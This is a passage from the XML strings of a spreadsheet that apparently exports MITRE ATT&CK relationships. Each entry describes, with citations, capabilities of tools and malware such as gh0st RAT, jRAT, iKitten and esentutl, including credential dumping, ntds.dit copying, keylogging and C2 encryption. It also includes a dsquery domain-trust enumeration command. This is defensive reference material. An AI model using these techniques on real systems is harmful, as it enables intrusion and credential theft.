    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected external system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>relationship--2c13a056-b82d-4f56-a530-8562e0e9b038</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected internal system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>relationship--fb866766-d3a5-46f6-9d0e-afc6bd1c7962</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find information about the operating system.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>relationship--745106bb-3641-488e-ae1c-547cd6ea9b7a</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is used to execute programs and other actions at the command-line interface.(Citation: TechNet Cmd)</t>
  </si>
  <si>
    <t>relationship--fb60b027-facd-4be2-b8b2-0fb9351ea235</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list the directories on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--29be6a34-6a89-42e8-a6b1-dca821ed7f94</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to download files to the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--0efece7a-dc3a-46e1-b56c-7db9e3b61149</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list running processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--56e4717c-33ac-4d7e-a737-71aa520af93e</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to detect anti-virus products and processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--785d0d93-1500-40b5-9f71-9d51aadef914</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to gather information on installed applications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--c61ca699-62e8-4c42-b20c-3c042c0fb153</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to base64 encode C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--215c28bd-3698-4962-b8a9-c632f27c9c82</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to AES encrypt C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--f874b527-e973-40f2-89cb-2c7feab5b6b4</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the system volume information of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--14de629c-9b49-4841-901a-85fab61f693b</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the MAC address of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--dd002813-b9b0-435f-8fb1-ee015c401280</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--bea01073-649a-4b27-a9f5-72533faae8cc</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on user accounts within a domain.(Citation: TechNet Dsquery)(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--44259d7d-e156-4e09-a401-ff62f0706cdd</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on permission groups within a domain.(Citation: TechNet Dsquery)(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--f36a8899-940f-4c8f-924d-eef2f056744d</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on domain trusts with &lt;code&gt;dsquery * -filter "(objectClass=trustedDomain)" -attr *&lt;/code&gt;.(Citation: Harmj0y Domain Trusts)</t>
  </si>
  <si>
    <t>relationship--da7ddc38-f706-43b4-b3e7-fa3e5d1d2cff</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) has the ability to enumerate various information, such as the operating system and host name, for systems within a domain.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--f9c5fdd4-4978-433f-a718-f8f512e13cac</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to collect data from local file systems.(Citation: Red Canary 2021 Threat Detection Report March 2021)</t>
  </si>
  <si>
    <t>relationship--dcca4e73-fa98-4d67-8ed3-590da7a32d43</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can use the Volume Shadow Copy service to copy locked files such as `ntds.dit`.(Citation: LOLBAS Esentutl)(Citation: Cary Esentutl)</t>
  </si>
  <si>
    <t>relationship--18d36fff-42e8-4b33-b747-9b898a594eb2</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files from a given URL.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>relationship--bb4f1b15-8382-44f9-b201-6726e83b79b0</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files to/from a remote share.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>relationship--3b10d114-ce08-4c8f-b8c6-e2ed13e04912</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can copy `ntds.dit` using the Volume Shadow Copy service.(Citation: LOLBAS Esentutl)(Citation: Cary Esentutl)</t>
  </si>
  <si>
    <t>relationship--4faa4943-e54e-420d-a391-350ef629e766</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to read and write alternate data streams.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>relationship--5181727e-706d-4e57-8a41-628a27e03c6c</t>
  </si>
  <si>
    <t>05 September 2019</t>
  </si>
  <si>
    <t>[ftp](https://attack.mitre.org/software/S0095) may be used to exfiltrate data separate from the main command and control protocol.(Citation: Microsoft FTP)(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>relationship--ac3ee298-bef0-4a52-9050-3dcef1701408</t>
  </si>
  <si>
    <t>[ftp](https://attack.mitre.org/software/S0095) may be abused by adversaries to transfer tools or files from an external system into a compromised environment.(Citation: Microsoft FTP)(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>relationship--bb4592cf-4e26-4999-bb6d-5120e0695bfa</t>
  </si>
  <si>
    <t>[ftp](https://attack.mitre.org/software/S0095) may be abused by adversaries to transfer tools or files between systems within a compromised environment.(Citation: Microsoft FTP)(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>relationship--349bc11d-b377-410b-9232-2c5f0fbde031</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to wipe event logs.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--ad696f42-0631-43fb-893b-a5616f14f93f</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to open a remote shell to execute commands.(Citation: FireEye Hacking Team)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>relationship--68852bf2-c3cf-4d59-b1c1-f6af8fb61be6</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used DLL side-loading.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>relationship--6874b50a-10e8-4036-bb2d-aabab35ec75b</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has decrypted and loaded the [gh0st RAT](https://attack.mitre.org/software/S0032) DLL into memory, once the initial dropper executable is launched.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--8631491d-bda8-4eee-93ec-5f3fc6340c3f</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has encrypted TCP communications to evade detection.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--cc2de45c-a1f3-4085-ac35-dffa8a86e9b3</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--b2876820-3402-45e3-a0af-f85237a23ae6</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to to delete files.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--af883d09-3f26-4267-9081-4783447e3283</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can download files to the victim’s machine.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--33a382a9-ebb3-48d9-bb7e-394a27783668</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has a keylogger.(Citation: Alintanahin 2014)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--becf0a5e-4636-4d2f-bd4a-fd60b15ee74a</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has altered the InstallTime subkey.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--0f4c2cab-c3ca-4f31-8557-485248b65761</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used the `InterlockedExchange`, `SeShutdownPrivilege`, and `ExitWindowsEx` Windows API functions.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--9966a850-54b2-41f5-83de-51c066085d72</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used an encrypted protocol within TCP segments to communicate with the C2.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--8f8adede-8b7a-460d-b852-b52328df178a</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to list processes.(Citation: FireEye Hacking Team)</t>
  </si>
  <si>
    <t>relationship--a564f3da-349a-4e65-826c-8ca60bc920bf</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can inject malicious code into process created by the “Command_Create&amp;Inject” function.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--5291c077-dc09-4716-ab9a-d65318794839</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has checked for the existence of a Service key to determine if it has already been installed on the system.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--80d8e746-f0a0-4781-824a-0147dbbee072</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has added a Registry Run key to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--ab2b2cd2-9f20-4497-a6d3-ef1698809779</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used rundll32 for execution.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>relationship--5a771636-9b4d-423c-b7ba-1f274cbfb5b7</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can capture the victim’s screen remotely.(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>relationship--b0a40611-da3c-4447-b0af-fa66f927b623</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can execute its service if the Service key exists. If the key does not exist, [gh0st RAT](https://attack.mitre.org/software/S0032) will create and run the service.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--6397d645-207c-4d1b-9a65-5f1b69a84e7c</t>
  </si>
  <si>
    <t>24 July 2020</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can load DLLs into memory.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--02d4ee3d-adb9-49fc-8e91-3379c508692b</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used Zlib to compress C2 communications data before encrypting it.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--c16854fa-add6-4be3-9547-05cc479861d8</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) uses RC4 and XOR to encrypt C2 traffic.(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>relationship--8df1a464-9623-46bf-b23b-0430aa0a8c44</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has gathered system architecture, processor, OS configuration, and installed hardware information.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--aee29ae1-4544-4fc8-b30b-4717888991ca</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can create a new service to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>relationship--a9a71970-33d1-4336-acb3-9252b91d27a4</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump LSA secrets.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>relationship--2d063a40-dbba-458f-897d-2b756a2591b1</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump Windows password hashes from the SAM.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>relationship--108a1655-faba-4016-a276-c224665cb5c4</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) provides command-line access to the compromised system.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>relationship--3ada7220-b5a6-45b9-a7ca-4a26423da831</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) installs itself as a service for persistence.(Citation: Dell Lateral Movement)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>relationship--8d976244-6d4e-443a-98c0-52fe1d94c388</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) encrypts C2 content with XOR using a single byte, 0x12.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--5b3d2b2f-73f4-4fef-9cb9-b11db3eb4c4f</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--a45f37c0-da3f-4766-bdb2-4cc1f4bda04d</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) opens cmd.exe on the victim.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--ae370b88-fd93-4803-a154-aa3debf2327b</t>
  </si>
  <si>
    <t>S0278</t>
  </si>
  <si>
    <t>iKitten</t>
  </si>
  <si>
    <t>malware--2cfe8a26-5be7-4a09-8915-ea3d9e787513</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will zip up the /Library/Keychains directory before exfiltrating it.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--90bd9900-a78f-47da-9504-393e8ece3fac</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) prompts the user for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--31a72381-c672-404f-afd2-17bfb2aa3078</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) saves itself with a leading "." so that it's hidden from users by default.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--b1d1e98b-e3fe-43d8-8b6d-810d8bc6cfab</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) collects the keychains on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--f5cf9158-6f25-4167-8263-5a356bf816b9</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) lists the current processes running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--5647be4e-ef31-4b7d-a2d1-7feefafab345</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) adds an entry to the rc.common file for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--fed9f1de-bd5b-4715-ae70-ad457e89a988</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will look for the current IP address.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--1e59381b-fcf5-43e1-b8d5-499db015b208</t>
  </si>
  <si>
    <t>S0101</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>relationship--01e01c24-ba4c-41d7-8f30-8fca364dc2c6</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>relationship--b91e06c1-9546-4184-9552-ba501bf9182e</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture microphone recordings.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--cdd356f2-bd44-497c-b02d-30ad9ed869a2</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture clipboard data.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--ac3fb8d5-9d9d-4701-a269-53e838850d71</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--c1108137-b707-4358-b4b2-b2f139418f7e</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--890f944f-190d-456d-b194-f5ecb17a0868</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has a function to delete files from the victim’s machine.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>relationship--417552c3-3db4-491a-86bb-7fe2c513d406</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can browse file systems.(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>relationship--7de1c513-5141-45ed-aeb0-b1b221f4dc3f</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can download and execute files.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>relationship--730190b3-d372-4461-9bf4-94de4c078968</t>
  </si>
  <si>
    <t xml:space="preserve">[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with JScript.(Citation: Kaspersky Adwind Feb 2016)	</t>
  </si>
  <si>
    <t>relationship--a28ed204-7e5c-4090-a0c5-0a056ef602fe</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to log keystrokes from the victim’s machine, both offline and online.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--0b9a4cdc-8305-49ec-879f-6cfa35763af2</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</si>
  <si>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</si>
  <si>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relationship--ec2e27c9-71fe-4650-a5b9-1247193c39f6</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can map UPnP ports.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--0c93519a-28a4-4d29-99bc-02c4d0e53ae2</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can steal keys for VPNs and cryptocurrency wallets.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--fe720085-2a43-4f72-8a5f-cf6ae82f7127</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can query and kill system processes.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>relationship--7c1e2638-ca07-4825-b7e8-43690912ce74</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can serve as a SOCKS proxy server.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--8fd75064-d1b8-4b8c-b9ea-5b65a1cc0ea8</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can support RDP control.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--7fc56f31-3cf9-411c-a6a2-79bbaab13f29</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can be configured to reconnect at certain intervals.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--0d7811d3-d4ee-4114-b841-c0463f2274be</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to take screenshots of the victim’s machine.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--ea2f957a-b144-4f06-b3fe-891df62f9444</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--8e685821-98a3-42a0-9c6a-334a8ff078d4</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) payloads have been packed.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--89210061-1ce3-4fdf-af84-2afee2062296</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list and manage startup entries.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--68f6cc6d-b90b-4a56-a867-99b3a2786b11</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>relationship--4e6c5e8c-96a2-4da8-869a-56fe224e037e</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can gather victim internal and external IPs.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--ef97d2bb-7e5a-4c3b-8e7d-cc4fb098c47d</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list network connections.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--eb808671-1f29-4e76-9433-b50176abf60a</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list local services.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--40da5ea7-b4d1-45a4-944e-c1c74e408086</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to capture video from a webcam.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--2043a8a7-d365-4f5c-9ee3-5b9be710f14d</t>
  </si>
  <si>
    <t xml:space="preserve">[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with VBScript.(Citation: Kaspersky Adwind Feb 2016)	</t>
  </si>
  <si>
    <t>relationship--149f62ba-b5c1-4dcb-b677-a45b72cf5d7b</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has command line access.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>relationship--2b2ccd03-b6ad-4125-a05d-851ebf353bb5</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>relationship--1157b635-1cd6-4f65-9be6-09a9f7ac1664</t>
  </si>
  <si>
    <t>S1048</t>
  </si>
  <si>
    <t>macOS.OSAMiner</t>
  </si>
  <si>
    <t>malware--2a59a237-1530-4d55-91f9-2aebf961cc37</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `osascript` to call itself via the `do shell script` command in the [Launch Agent](https://attack.mitre.org/techniques/T1543/001) `.plist` file.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>relationship--f713c899-8064-4cb2-8068-d5534d1e3d36</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</si>
  <si>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</si>
  <si>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relationship--efd84e8c-6979-4f79-916c-0c6044bc1a85</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has embedded [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) within another run-only [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008).(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>relationship--5f79680a-7b9f-47fd-bb81-025eb6368139</t>
  </si>
  <si>
    <t xml:space="preserve">[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `curl` to download a [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) from a public facing adversary-controlled webpage. </t>
  </si>
  <si>
    <t>relationship--0a8e3f80-f415-450c-9976-feb917facd8a</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has placed a [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) with a `plist` extension in the [Launch Agent](https://attack.mitre.org/techniques/T1543/001)'s folder. (Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>relationship--9c59b652-09bc-4457-8342-949a87c1fafa</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `launchctl` to restart the [Launch Agent](https://attack.mitre.org/techniques/T1543/001).(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>relationship--b164ac03-0d0b-494b-b433-7df173308019</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `ps ax | grep &lt;name&gt; | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>relationship--f1b29d7e-eba7-460a-bcec-33caf6a4fe15</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</si>
  <si>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</si>
  <si>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relationship--596ef2d8-53ff-4fde-8dd2-08b53371d0da</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>relationship--43cb492f-99c9-4c36-9de7-2a20537ea8cc</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) can gather the device serial number and has checked to ensure there is enough disk space using the Unix utility `df`.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>relationship--71935bd0-44ca-4d2b-850d-707bc4db91d5</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended destination.</t>
  </si>
  <si>
    <t>relationship--b1334535-019a-4d6a-88c1-8bb6741f152b</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) has used XOR-based encryption for collected files before exfiltration.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--609a0483-ac4a-49d6-bc5d-3cb0ff6e8a97</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can support an HKCMD sideloading start method.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--b5dfef8a-32b2-481f-a55d-0bbfbebfc872</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can collect files and system information from a compromised host.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--a08900f6-65be-4022-8ad8-fe6c6c91c1d0</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can decrypt and load other modules.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--5998186f-20af-4b30-8ae7-4d4648d96327</t>
  </si>
  <si>
    <t>[metaMain](https://attack.mitre.org/software/S1059) can upload collected files and data to its C2 server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
